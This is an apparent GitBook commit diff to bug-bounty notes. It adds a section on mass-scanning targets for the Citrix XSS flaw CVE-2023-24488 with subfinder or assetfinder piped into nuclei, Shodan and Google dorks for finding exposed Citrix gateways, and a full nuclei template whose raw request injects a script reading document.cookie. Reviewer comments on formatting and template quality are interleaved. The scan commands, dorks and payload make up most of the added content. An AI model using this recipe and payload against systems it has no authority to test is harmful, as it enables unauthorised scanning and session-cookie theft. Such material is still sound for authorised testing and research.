GITBOOK-51: change request with no subject merged in GitBook

Xalgord 2023-07-25 11:16:45 +00:00 committed by gitbook-bot
parent 692f151b2b
commit aedb40ca27
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 61 additions and 0 deletions

@ -359,6 +359,21 @@ GET /?q=xss POST /q=xss
<iMg src%3dN onerror%3dalert(0x000D98)>
```
### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty
**Command**:\
subfinder -d [target.com](http://target.com/) -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
\
assetfinder [target.com](http://target.com/) | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
\
**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md "mention")\
\
**Shodan Dork**:\
ssl:[target.com](http://target.com/) title:"Citrix gateway"\
\
**Dork**:\
intitle:"Citrix Gateway" -site:[citrix.com](http://citrix.com/)
### Some awesome people on twitter
* [@Dark\_Knight](https://twitter.com/\_Dark\_Knight\_)
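Review bot: The two command lines and both dorks in the new "Nuclei CVE-2023-24488" section are written as running Markdown, with auto-linked `[target.com](http://target.com/)` and trailing `\` line breaks, so what renders or gets copied is not the literal command. Put them in a fenced block with a bare placeholder such as `target.com`. The new heading also sits directly against the closing fence above it, and `### Some awesome people on twitter` directly against the last dork line; add blank lines around both so every renderer treats them as headings. The section names the CVE but gives no pointer to the vendor fix, which a reader who gets a hit on their own gateway would need next.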

@ -13,3 +13,4 @@
* [🔎 How I hacked NASA and got 8 bugs ?](recon-strategies-by-other-hackers/how-i-hacked-nasa-and-got-8-bugs.md)
* [🔎 Simple Recon Methodology](recon-strategies-by-other-hackers/simple-recon-methodology.md)
* [🌀 Possible "Content-Type" Header values](possible-content-type-header-values.md)
* [🎯 XSS nuclei template CVE-2023-24488.yaml](xss-nuclei-template-cve-2023-24488.yaml.md)
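Review bot: The new list entry uses the file name as its title ("XSS nuclei template CVE-2023-24488.yaml"), unlike the descriptive titles of the entries above it. Consider a title along the lines of "Nuclei template: CVE-2023-24488 (Citrix XSS)", and drop the doubled extension in the link target `xss-nuclei-template-cve-2023-24488.yaml.md`.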

@ -0,0 +1,45 @@
# 🎯 XSS nuclei template CVE-2023-24488.yaml
```yaml
id: CVE-2023-24488
info:
name: CVE-2023-24488
author: assetnote
severity: medium
description: description
reference:
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
tags: tags
requests:
- raw:
- |+
GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
Cookie: NSC_TASS=/Citrix
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-GB,en
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- <script>alert(document.cookie)</script>
- type: status
status:
- 302
```
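Review bot: In the `info` block, `description: description` and `tags: tags` are placeholder values left in, so the template cannot be selected by tag and a hit carries no explanation of what was found; fill both in (for example tags such as `cve,cve2023,citrix,xss`). In `matchers`, the body word match combined with status 302 never checks that the response is served as HTML; adding a header matcher on `text/html` would reduce false positives. The raw request also carries a long run of browser headers (`Sec-Ch-Ua*`, `Sec-Fetch-*`, `Sec-Gpc`, `Accept-Language`) that the matchers do not depend on and that could be trimmed to `Host` and the `Cookie` line. The YAML as shown here has no indentation, so confirm the committed file parses before merging.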